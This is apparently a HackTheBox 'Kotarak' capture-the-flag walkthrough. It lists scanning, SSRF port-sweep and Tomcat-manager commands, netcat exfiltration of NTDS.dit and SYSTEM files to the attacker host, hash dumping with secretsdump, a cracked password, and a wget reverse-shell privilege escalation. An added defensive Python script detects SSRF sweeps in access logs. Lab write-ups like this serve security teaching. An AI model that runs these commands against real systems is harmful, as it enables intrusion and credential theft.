Kotarak

HTB Linux

nmap -A -p- -oA kotarak 10.129.1.117 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA kotarak 10.129.1.117

nmap -sU -O -p- -oA kotarak-udp 10.129.1.117

nmap -sCV -p80,443 10.129.1.117 -oN targeted

whatweb 10.129.1.117

http://10.129.1.117:60000

wfuzz -c -t 400 --hc=404 --hh=3 -z range,1-65535 http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ

http://10.129.1.117:60000/url.php?path=http://localhost:888?doc=backup
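
From the defender's side, the wfuzz sweep and the backup fetch above leave a very recognisable trace in the web server's access log: one client hitting url.php with many different loopback ports in a short time. The following script is an added example (not part of the original writeup) that parses combined-format access log lines, extracts the host and port requested through the path parameter, and flags clients that probed several internal ports. The log lines are constructed samples, and the url.php path and path= parameter name are taken from this box.

```python
# Added example: detect SSRF-driven internal port sweeps via /url.php?path=http://localhost:<port>
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample access log (combined format); not real traffic from the machine.
SAMPLE_LOG = """\
10.10.14.25 - - [22/Jul/2017:10:01:01 +0000] "GET /url.php?path=http://localhost:22 HTTP/1.1" 200 12
10.10.14.25 - - [22/Jul/2017:10:01:01 +0000] "GET /url.php?path=http://localhost:80 HTTP/1.1" 200 3
10.10.14.25 - - [22/Jul/2017:10:01:02 +0000] "GET /url.php?path=http%3A%2F%2Flocalhost%3A888%3Fdoc%3Dbackup HTTP/1.1" 200 1181
10.10.14.25 - - [22/Jul/2017:10:01:02 +0000] "GET /url.php?path=http://127.0.0.1:3306 HTTP/1.1" 200 3
10.10.14.25 - - [22/Jul/2017:10:01:03 +0000] "GET /url.php?path=http://localhost:8080 HTTP/1.1" 200 3
192.168.1.5 - - [22/Jul/2017:10:02:00 +0000] "GET /url.php?path=http://example.com/ HTTP/1.1" 200 512
192.168.1.5 - - [22/Jul/2017:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Hostnames that mean "the web server itself" from the SSRF's point of view.
LOOPBACK = {"localhost", "127.0.0.1", "::1", "0.0.0.0"}

def internal_target(target):
    """Return (host, port) when the request asks url.php to fetch a loopback address, else None."""
    req = urlparse(target)
    if req.path != "/url.php":
        return None
    values = parse_qs(req.query).get("path")  # parse_qs already percent-decodes the value
    if not values:
        return None
    dest = urlparse(values[0])
    if dest.hostname not in LOOPBACK:
        return None
    # Assumption: a URL without an explicit port targets the default HTTP port.
    return dest.hostname, dest.port if dest.port is not None else 80

def find_ssrf_sweeps(log_text, min_ports=3):
    """Map client IP -> sorted loopback ports probed through url.php, keeping clients at or above min_ports."""
    ports_by_client = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access log line
        hit = internal_target(m.group("target"))
        if hit:
            ports_by_client[m.group("ip")].add(hit[1])
    return {ip: sorted(p) for ip, p in ports_by_client.items() if len(p) >= min_ports}

if __name__ == "__main__":
    for ip, ports in find_ssrf_sweeps(SAMPLE_LOG).items():
        print(f"{ip} probed {len(ports)} internal ports via url.php: {ports}")
```

A single request for localhost:888?doc=backup would not trip the port threshold on its own, so pairing this with an alert on any url.php fetch whose destination is a loopback address is the more robust rule.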

http://10.129.1.117:8080/manager/html

We enter the credentials found in the previous screenshot.

python -c 'import pty; pty.spawn("/bin/bash")'

(CTRL+ Z)

stty raw -echo; fg

reset xterm

export TERM=xterm

export SHELL=bash

find -name user.txt 2>/dev/null | xargs cat

We see the .dit and .bin files.

We transfer the files.

nc 10.10.14.25 443 < 20170722._089134.bin

nc -lvnp 443 > ntds.bin

nc 10.10.14.25 443 < 20170722._089134.dit

nc -lvnp 443 > ntds.dit

file *

mv ntds.bin SYSTEM

mv ntds.dit ntds

python3 /opt/impacket/example/secretsdump.py -ntds ntds -system SYSTEM LOCAL

We see the hash for atanas.

cat hash | awk '{print $4}' FS=":" | xclip -sel clip

We go to crackstation and see the credentials.

su atanas

password: f16tomcat!

ls -l /etc/authbind

authbind nc -lvnp 80

We see that the wget version is 1.16.

We change the IP and set up a reverse shell in the script.

authbind python -m pyftpdlib -p21 -w

authbind python exploit.py

nc -lvnp 443

© 2025 Cu3rv0x